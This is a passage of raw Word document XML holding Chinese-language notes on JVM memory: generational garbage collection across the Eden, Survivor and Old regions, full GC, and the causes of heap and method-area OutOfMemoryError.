          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中活跃对象放入</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          d</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区被用来作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>old</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的中间交换区域，当</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OLD</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区空间足够时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区的对象会被移到</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Old</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区，否则会被保留在</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          e</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OLD</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区空间不够时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OLD</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>full GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          f</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>full GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后，若</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OLD</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区仍然无法存放从</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复制过来的部分对象，导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无法在</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区为新对象创建内存区域，则出现”</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>out of memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>错误”：</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>outOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java heap space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法区内存溢出（</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>outOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>permgem space</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>规范中，方法区主要存放的是类信息、常量、静态变量等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所以如果程序加载的类过多，或者使用反射、</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>gclib</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等这种动态代理生成类的技术，就可能导致该区发生内存溢出，一般该区发生内存溢出时的错误信息为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>outOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>permgem space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00861857" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
